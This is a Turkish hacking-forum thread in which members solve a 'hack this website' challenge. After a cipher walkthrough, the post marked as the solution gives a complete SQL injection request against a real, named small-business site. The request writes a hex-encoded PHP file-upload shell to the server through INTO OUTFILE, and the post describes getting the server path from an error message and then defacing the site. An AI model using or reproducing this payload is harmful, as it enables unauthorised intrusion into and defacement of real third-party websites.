Tahribat.com Forumları
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Meydan Okuma - Hack Website Test

Yazar _PesimisT_ (1) abdullahazad (1) aksata (1) Allura (4) Andrei (1) biliy (1) BiUyeOlamadim (1) by_Tet (4) cache (2) ChelicK (2) DeadSoul (1) DuPi (1) furkiak (1) GusFring (1) Jilet_Boris (1) kaparike (3) KaptaN (1) MGT (1) mkyb (1) mkyyldrm (1) motka (1) nereodi (1) NoktaliVirgul (1) nurulmac11 (1) pesimistzombie (1) Realist (1) RitmFarbRacourci (2) sahinka (1) sancaks (2) SeRDaR (2) SerYolcu (1) turkz (1) zigor (3) Gösterim 10 50 75 100
Ağ ve Veri Güvenliği     Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri     Web sitesi Güvenliği, DOS - DDOS Saldırıları...     Bilgisayar Güvenliği - Backdoorlar     Virüs - Trojan - Keylogger - BotNet     Skype - Mirc - Irc - Icq - Mail Güvenliği     Bilişim Güvenliği     Hesaplar / Üyelikler     Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox     İnternet Güvenliğine Giriş Programlama     C#, Asp.Net, .Net Core     C - C++     Delphi - Pascal     Visual Basic - Basic - PicBasic ve Türevleri     Java     Android - IOS Programlama     Mobil Programlama     Asp - Php - Cgi - Perl     Assembly - Reverse Engineering     Html - CSS - XML - JavaScript - Ajax     Database - Veritabanı     Python     Grafik - Animasyon - Flash - 3D Modelleme     Webmaster ve Yazılım Geliştiriciler     Google / Yandex / Bing ve Servisleri     Programlama Genel     Programlamaya Giriş Bilgisayar ve Teknoloji     Microsoft Windows Ailesi İşletim Sistemleri     Linux ve Diğer İşletim Sistemleri     Donanım & Driver     Network - İnternet     Elektronik / Embedded / Mobil Cihazlar     Kriptoparalar & Blockchain     Fotografçılık ve Digital Fotograf Makineleri - Video Kameralar     Cep Telefonları, Gsm Operatörleri ve Mobil İnternet     Oyunlar     Yazılımlar / Diğer Programlar     Bilgisayarla İlgili Diğer Konular İnternet     Download / Dosya Paylaşım     Bilgisayar ve Internet Teknolojileri İle İlgili Video / Resim / Flash Paylaşım     İnternet Siteleri     Sosyal Ağlar Genel     Genel     Gündem - Güncel Konular     Derin Konular     Bilim Teknik Teknoloji     Müzik & Sinema & Tiyatro & Kitap & Televizyon & Seminerler & Edebiyat     Eğitim & Ödev & Bilimsel Döküman     E-Book     İş - Güç, E-Ticaret, Alışveriş     Hukuk & Muhasebe & Sigorta Soru - Cevap     Ulaşım Araçları ve Seyahat     Vukuatlar     Geyik & Teknoloji İle İlgili Olmayan Video / Resim / Flash Paylaşım Tahribat.com Konuları     Tahribat.com Programları®     Tahribat.Com - Açık Kapılar Önünde     Tahribat.Com - Sosyal Etkinlikler     TahriDepo

Meydan Okuma - Hack Website Test

1. 04/Tem/15 09:18 Kısayol Şikayet Özel Mesaj
   NoktaliVirgul
   
   

   Kayıt Tarihi: 02/Temmuz/2007
   

   tbt.html nerde :D

   Edit: neyse oluşturdum :D yaz benide listeye @Allura

   NoktaliVirgul tarafından 04/Tem/15 09:25 tarihinde düzenlenmiştir

   ---

   If my calculations are correct, when this baby hits eighty-eight miles per hour... you"re gonna see some serious shit.
   Alıntı yap
2. 04/Tem/15 09:29 Kısayol Şikayet Özel Mesaj
   turkz
   
   

   Kayıt Tarihi: 13/Aralık/2009
   

   En sonunda kısaca nasıl yapıldığını da anlatmalısın allura yapamayanlar olarak özeniyoruz :)

   ---

   Dünyayı iyiler kurtaracak.
   Alıntı yap
3. 04/Tem/15 10:18 Kısayol Şikayet Özel Mesaj
   mkyyldrm
   
   

   Kayıt Tarihi: 20/Haziran/2015
   

   Hocalar bu işler nasıl oluyor, o kriptodan web sitesini nasıl buluyorsunuz pm den anlatabilecek olan varmı yada buraya bi yerlere yazsa yeni başlayaıp öğrenmek isteyemlerr vardır benim gibi :)

   Alıntı yap
4. 04/Tem/15 10:57 Kısayol Şikayet Özel Mesaj
   zigor
   
   

   Kayıt Tarihi: 30/Eylül/2012
   

   Abi keşke konuyu açtıktan 2-3 gün sonra da çözüm yolunu kısaca anlatsan, biz de bir şeyler öğrensek. 

   Alıntı yap
5. 04/Tem/15 12:20 Kısayol Şikayet Özel Mesaj
   Muhalif Yorumcu
   SeRDaR
   
   Banlanmış Üye
   

   Kayıt Tarihi: 09/Kasım/2003
   

   mkyyldrm bunu yazdı

   Hocalar bu işler nasıl oluyor, o kriptodan web sitesini nasıl buluyorsunuz pm den anlatabilecek olan varmı yada buraya bi yerlere yazsa yeni başlayaıp öğrenmek isteyemlerr vardır benim gibi :)

   2-3 gün geçti 
   
   Kripto kısmını basitçe anlatayım sizlere
   
   ://   şu işaret olduğuna göre demekki web sitesi  web sitesi ne ile başlar  Http:// ile değilmi 
   
   bu adam ne yapmış myyi://KKK
   
   "m" yi "h" düşün "y" yi "t" "i" ye de p oluyor 
   
   "kkk" NE OLUYOR  " www"  
   
   buradan yola çıkarak hangi harfe hangi harf denk geliyorsa karşılaştırıp bulmaca misali harfleri yerine oturtacaksın
   
   en alta  "-sxxets"   yazmış bu adamın nicki çoğu şeyde imza niteliğinde en alta koyulmaz mı koyulur bu adamın Nicki ne "Allura"  sayın harf sayısını   "sxxets" ile aynı değilmi
   
   yine aynı mantık 
   
   "s" gördüğün yer neymiş "A" imiş "x "gördüğün yer "l" "e" gördüğün yer "u"  imiş
   
   Sitenin kısaltması TBT olduğundan yazının veya linkin içinde mutlaka TBT geçebilir diye düşüneceksin 
   
   bak linkin sonunda ypy var bu garanti TBT dir   bu ne demek oluyor p gördüğün yer aslında b imiş
   
   .ovz diyor bu ne oluyor  domain uzantısı nedir genelde ya .com dur ya da.net 
   
   en alttaki linke Baktığımızda bu adam tahribat.com u kesin yazmıştır diye tahmin ettiğimizde 
   
   htttp://www.tahribat.com ile harf sayısı bakın birebir tutuyor 
   
   zaten 
   
   şimdi gelelim linkin sonuna  "ypy" nin "tbt" olduğunu biliyoruz 
   
   "xa" yi da daha önce çözmüştü "le"olduğunu 
   
   oldu mu "letbt"   ne le tbt olacak olsa olsa mantık yürüttüğünde HACK konusu hackletbt  olur değilmi 
   
   bakalım zaten msof hack kelimesiyle eşit zaten 
   
   http://www.tcgnurl.com/hackletbt      böyle bir şey çıktı karşımızı ulan  bu "cgn" nedir diye düşüneceğiz 
   
   az mantığınızı çalıştıracaksınız sitenin url ile bittiğine göre bu kesin bir link kısaltma servisidir diye düşündüm ben açıkçası ama olmayabilirdide   ve denedim  miniurl ve tiny url aklıma geldi 
   
   sonradan düşündüm miniurl / dan sonra geleni kendi belirliyordu ama tiny url öyle değil sonuna kendin belirliyorsun
   
   http://www.tinyurl.com/hackletbt   yazdım
   
   bir baktım  tuttu ve gitti siteye 
   
   http://branthwaitecottages.co.uk/
   
   yani siteye ulaşmış bulundum
   
   Not: Arkadaşlar amatörce anlatmış olabilirim umarım anlamışsınızdır birazcık açıkçası bu konulara internette aşina olmanı gerek sıfırdan bir adamın tahmin etme olayı kısıtlı olur  ve kriptoyu çözme mantığı olmayabilir
   
   örneğin link kısaltma servislerinden haberi olmayan bir adam sittin sene bulamazdı gibi 
   
   ben bu şekilde ulaştım diğer arkadaşlar başka başka şekilde ulaşmış olabilirler hayal gücünüze bağlı birazda
   
   krpitoyu çözme kısmını ben anlattım diğer kısımlarıda diğer arkaşlar anlatırsa sevinirim....
   
   kolay gelsin 
   
   
   
   

    

    

   SeRDaR tarafından 04/Tem/15 14:18 tarihinde düzenlenmiştir

   ---

   Emekçiler ekmeklerini, emeklerinin karşılığı olarak ve önlenemez tarihi sürecin sonucu olarak mutlaka kazanacaklardır. Şüphesiz bu, zorlu bir dönemdir kısa vadeli ve göreceli yenilgilerden geçer.
   Alıntı yap
6. 04/Tem/15 13:23 Kısayol Şikayet Özel Mesaj
   zigor
   
   

   Kayıt Tarihi: 30/Eylül/2012
   

   Serdar abi açıklama için teşekkürler, çok eğlenceli bir şeymiş. 

   Alıntı yap
7. 06/Tem/15 12:06 Kısayol Şikayet Özel Mesaj
   Allura
   
   

   Kayıt Tarihi: 17/Mayıs/2009
   

   ----- SPOİLER ÇÖZÜM ------

   ----- SPOİLER ÇÖZÜM ------

    

   Çözümünü veriyorum,

   serdar kriptunun nasıl çözüldügünü anlattıgı için orasını geçiyorum

   bkz: kriptu çözümü= http://www.tahribat.com/forum/meydan-okuma---hack-website-test-208426/5#msg2594172

   gelelim shell yüklemeye 

   sitenin ismi http://branthwaitecottages.co.uk içerisinde 4-5 adet php dosyası mevcut bunlardan bir tanesinde sql açıgı bulunmakta

   sql injection kullanılarak ve database user yetkilerinin fazla olması sebebi ile grant all priv.. yazma yetkimiz bulunuyor burada mysql yetkilendirmesi hatası var

   bu açıgı kullanarak sql injectionyaparken sunucuya istedigimiz şeyi yazabiliyoruz

   http://branthwaitecottages.co.uk:80/Gallery.php?pagenum=1&menu=off&imagefilter=1 LIMIT 0,1 INTO OUTFILE 'C:/wamp/www/branthwaite/tbtyukle.php' LINES TERMINATED BY 0x92020202020203c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e-- #
   
   

   
   kodu kullanarak dizine tbtyukle.php dosyasını yüklemiş oluyoruz dizini nasıl buldugumuza gelirsek kod hatası sebebi ile bize yolu veriyor site http://branthwaitecottages.co.uk:80/Gallery.php?pagenum=1&menu=off&imagefilter=1' bu şekilde girerseniz yol görünüyor.

   shell yükledikten sonra birşey kalmıyor zaten geçmiş olsun editle geç

    

   ----- SPOİLER ÇÖZÜM ------

   ----- SPOİLER ÇÖZÜM ------

   ---

   "
   Alıntı yap
8. 22/Nis/19 11:10 Kısayol Şikayet Özel Mesaj
   RitmFarbRacourci
   
   

   Kayıt Tarihi: 14/Mart/2008
   

   SerYolcu bunu yazdı

   Allura bunu yazdı

   olayımız bu kadar kriptolu resmi koyuyorum başlayabilirsiniz :)

    

    

      Bu kripto nasıl çözülüyor... Birisi anlatsın bi...

   Nassııı. o zaman fark edememişşim.. Ee Çantalarda kullanılan dönel şifrelerden imâ ediyorsun ama. 

   ---

   I'şıkY'ılı;^^`) Zk't^^` RnSySyTk.Ödl.SpRtÇzBşBkYd Kryptia.agogE Sa'd-l'Suûd az.ç'k 'lmyn'Dşn Pnct'tnAnNttn Blgi,YpBlgi 'Ct'nDrm.CmdyDrm.MdrnDrm hRşYdşR ClptcPth'Strsm M'nPhs' Ld,X/Y YrYnZmnGrçklk,AlgBzklğ KrzFrst'tr Tiytr' Pugchv,Jtrn,İmmlmn,FllngLef,Pik' SuprmcySprrty CoBehTh elFnmno:NzrioRonldo AdnKy TkSs,TkHrf(?) .RtNsTk.KvMp.Mk.TrmDyn ScklkNmRzgr ŞkHcBy ccp.kky Snrlr'Çz SnaSnLzmsn 'NsnKsknçtr BgDppr.MagllnCl'ds.S'thCro's Ch'kW'ng CreazioneDiAdamo^^`, Arctrs.Spic' ArcScnd,YySnye TrbProp,TrbJet,TrbFan ~3.10^5km/sn~343m/sn ~900-1240m/snMacH RamJt,ScRamJt Przdi^^' Tbu.XL Prsek MAtv^^` mLAT G'dWllHnting(f). 3id't^^` TareZmenPr ParaMotor TrflrVArsİlşklr (-)+.(/)*,~ ZminŞkil . ..Bu imza @SubZero tarafindan degistirilmistir. "Bu kadar uzun karmakarisik bir imza yapma diye uyardim ama heeheeeey(^^D)_hey kim söylüyor, kim dinliyor." Imzanizi SubZero'ya bilgi vermeden degistirmeyiniz. Tesekkurler...
   Alıntı yap

Cevapla